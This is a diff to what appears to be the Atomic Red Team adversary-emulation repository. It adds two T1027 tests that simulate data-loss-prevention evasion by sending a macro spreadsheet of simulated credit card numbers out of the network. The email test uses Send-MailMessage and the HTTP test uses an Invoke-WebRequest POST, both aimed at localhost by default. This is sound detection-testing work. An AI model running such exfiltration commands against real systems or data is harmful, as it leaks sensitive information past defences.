diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4fefac9b..a8e72c30 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -377,6 +377,8 @@ defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
+defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 766fe117..e3a45879 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -262,6 +262,8 @@ defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Shar
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
+defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 96704302..eaf5e1e5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -661,6 +661,8 @@
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
+ - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
+ - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 35f36bb9..6433b60d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -479,6 +479,8 @@
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
+ - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
+ - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 30abba87..eb828f52 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -28672,6 +28672,60 @@ defense-evasion:
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
del /Q "%temp%\T1027.zip" >nul 2>nul
name: command_prompt
+ - name: DLP Evasion via Sensitive Data in VBA Macro over email
+ auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+ description: |
+ Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
+ Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path of the XLSM file
+ type: path
+ default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ sender:
+ description: sender email
+ type: string
+ default: test@corp.com
+ receiver:
+ description: receiver email
+ type: string
+ default: test@corp.com
+ smtp_server:
+ description: SMTP Server IP Address
+ type: string
+ default: 127.0.0.1
+ dependency_executor_name: powershell
+ executor:
+ command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
+ Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ -SmtpServer #{smtp_server}"
+
+'
+ name: powershell
+ - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
+ auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
+ description: |
+ Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
+ Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path of the XLSM file
+ type: path
+ default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ ip_address:
+ description: Destination IP address
+ type: string
+ default: 127.0.0.1
+ dependency_executor_name: powershell
+ executor:
+ command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+
+'
+ name: powershell
T1218.008:
technique:
id: attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 26242614..74a09cdb 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -18,6 +18,10 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
- [Atomic Test #4 - Execution from Compressed File](#atomic-test-4---execution-from-compressed-file)
+- [Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email](#atomic-test-5---dlp-evasion-via-sensitive-data-in-vba-macro-over-email)
+
+- [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http)
+
@@ -174,4 +178,68 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
+
+
+
+## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
+Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
+Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
+| sender | sender email | string | test@corp.com|
+| receiver | receiver email | string | test@corp.com|
+| smtp_server | SMTP Server IP Address | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
+Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
+Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
+| ip_address | Destination IP address | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+```
+
+
+
+
+
+